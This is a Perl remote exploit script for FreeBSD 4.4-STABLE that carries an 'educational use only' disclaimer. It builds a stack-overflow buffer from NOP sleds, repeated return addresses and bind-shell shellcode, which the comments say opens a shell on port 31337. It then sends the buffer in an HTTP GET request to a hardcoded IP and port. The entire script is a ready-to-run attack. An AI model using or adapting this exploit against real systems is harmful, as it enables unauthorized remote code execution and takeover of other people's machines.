#!/usr/bin/perl # # This piece of code may not be distributed without # My explicit permission (zilli0n@gmx.net) ! # # For educational use only ! # # Written for FreeBSD 4.4-STABLE use IO::Socket; $size1 = 624 - 32; $size2 = 163 - 16; #$a = "A" x $size1; #$b = "B" x $size2; #$buffer = "$a$b"; # Written by MayheM binds a shell to port 31337 $shellcode = "\xeb\x6a\x5e\x31\xc0\x31\xdb\x88\x46\x07\xb0\x02\xcd\x80\x6a". "\x06\x6a\x01\x6a\x02\xb0\x61\x50\xcd\x80\x89\xc2\x31\xc0\xc6". "\x46\x09\x02\x66\xc7\x46\x0a\xaa\xaa\x89\x46\x0c\x6a\x10\x8d". "\x46\x08\x50\x52\x31\xc0\xb0\x68\x50\xcd\x80\x6a\x01\x52\x31". "\xc0\xb0\x6a\x50\xcd\x80\x31\xc0\x50\x50\x52\xb0\x1e\x50\xcd". "\x80\xb1\x03\xbb\xff\xff\xff\xff\x89\xc2\x43\x53\x52\xb0\x5a". "\x50\xcd\x80\x80\xe9\x01\x75\xf3\x31\xc0\x50\x50\x56\xb0\x3b". "\x50\xcd\x80\xe8\x91\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; $nop = "\x90"; $esp = 0xbfbffa08; $offset = "30"; print("New return address: 0x", sprintf('%lx',($esp + $offset)), "\n"); $nret = pack('l', ($esp + $offset)); ########################################################################## # # Filling first part of the buffer with nops and return addresses. # for ($i = 0; $i < $size1; $i++) { $buffer .= $nop; } for ($i = 0; $i < 32; $i += 4) { $buffer .= $nret; } ########################################################################## # # Filling our second part with the return addresses nops and shellcode # for ($i = 0; $i < 16; $i += 4) { $buffer .= $nret; } for ($i = 0; $i < ($size2 - length($shellcode)); $i++) { $buffer .= $nop; } $buffer .= $shellcode; ########################################################################## # # Make a socket connection and send our buffer # $lbuffer = length($buffer); print "Buffer is ready: $lbuffer bytes\n"; my $sock = new IO::Socket::INET ( PeerAddr => '10.5.12.34', PeerPort => '8000', Proto => 'tcp', ); die "Could not create socket: $! \n" unless $sock; print $sock "GET $buffer HTTP/1.0\n"; close($sock);